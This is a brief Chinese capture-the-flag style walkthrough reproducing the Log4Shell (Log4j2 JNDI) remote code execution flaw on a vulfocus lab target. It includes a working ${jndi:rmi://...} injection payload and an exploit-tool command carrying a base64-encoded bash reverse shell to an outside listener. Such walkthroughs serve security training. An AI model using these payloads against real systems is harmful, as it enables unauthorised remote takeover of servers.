0x0 前言
相信大家都不陌生,log4j2 ,核彈級漏洞,2021年12月9日,國內多家機構監測到Apache Log4j存在任意代碼執行漏洞,並緊急通報相關情況。由於Apache Log4j存在遞歸解析功能,未取得身份認證的用戶,可以從遠程發送數據請求輸入數據日志,輕松觸發漏洞,最終在目標上執行任意代碼。
0x01 環境搭建
這里直接用vulfocus了,還是比較全的
地址:http://vulfocus.fofa.so


漏洞地址,和簡單描述
0x02 漏洞復現
訪問 http://vulfocus.fofa.so:48534/hello
抓包

然后用vps 起jndi 和nc監聽
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjIuMy40Lzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "1.2.3.4"

這里根據自己jdk版本使用payload

改包

payload=${jndi:rmi://xxx:1099/yx1rbe} //多試幾個
發包后看jndi監聽流量

然后再看nc

現在已經拿到shell,解題自己找下flag,提交就OK了。
